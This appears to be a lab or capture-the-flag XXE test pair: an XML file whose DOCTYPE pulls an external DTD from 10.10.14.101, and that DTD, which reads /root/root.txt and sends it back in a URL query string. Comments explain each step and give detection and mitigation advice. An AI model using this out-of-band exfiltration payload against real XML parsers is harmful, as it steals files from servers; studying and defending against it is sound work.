- kavi_creds.xml
<?xml version="1.0" encoding="UTF-8"?>
<!-- XXE test document, out-of-band variant. The internal DTD subset on the next line
     declares the parameter entity "xxe" with a SYSTEM identifier on a remote host and
     references it immediately. A parser with DTD processing and external entity
     resolution enabled will therefore request kavi.dtd over HTTP while reading the
     DOCTYPE, before any element content is parsed.
     Consumer-side mitigation: reject any document that carries a DOCTYPE, or disable
     external entity resolution and external DTD loading in the parser configuration,
     and deny outbound HTTP from the host that parses uploaded XML. -->
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM 'http://10.10.14.101/kavi.dtd'> %xxe;]>
<credits>
<!-- The reference below uses general entity syntax, while the only "xxe" declared on
     this page is a parameter entity. Any error a parser raises at this point comes
     after the DOCTYPE has been processed, so a failed parse is not evidence that no
     outbound request was made. -->
<author>&xxe;</author>
</credits>
- kavi.dtd
<!-- External DTD fetched by the DOCTYPE in kavi_creds.xml. It is written to read a
     local file on the parsing host and place its contents in the query string of a
     second HTTP request (out-of-band exfiltration).
     Detection: proxy, DNS or firewall logs showing the XML-processing service
     requesting a .dtd file from an unexpected host, followed by a request to the same
     host whose query string carries file content.
     Mitigation: disable DTD and external entity processing in the parser, restrict
     egress from the service, and run it under an account that cannot read sensitive
     files. -->
<!-- Parameter entity "file": SYSTEM identifier is a file: URI on the parsing host. -->
<!ENTITY % file SYSTEM "file:///root/root.txt">
<!-- Parameter entity "eval": its replacement text is itself a declaration of a further
     entity, "exfiltrate", whose SYSTEM URL embeds the value of "file". -->
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://10.10.14.101/?flag=%file;'>">
<!-- Expanding "eval" is what introduces the "exfiltrate" declaration. -->
%eval;
<!-- Expanding "exfiltrate" is the step that would resolve the URL built above. -->
%exfiltrate;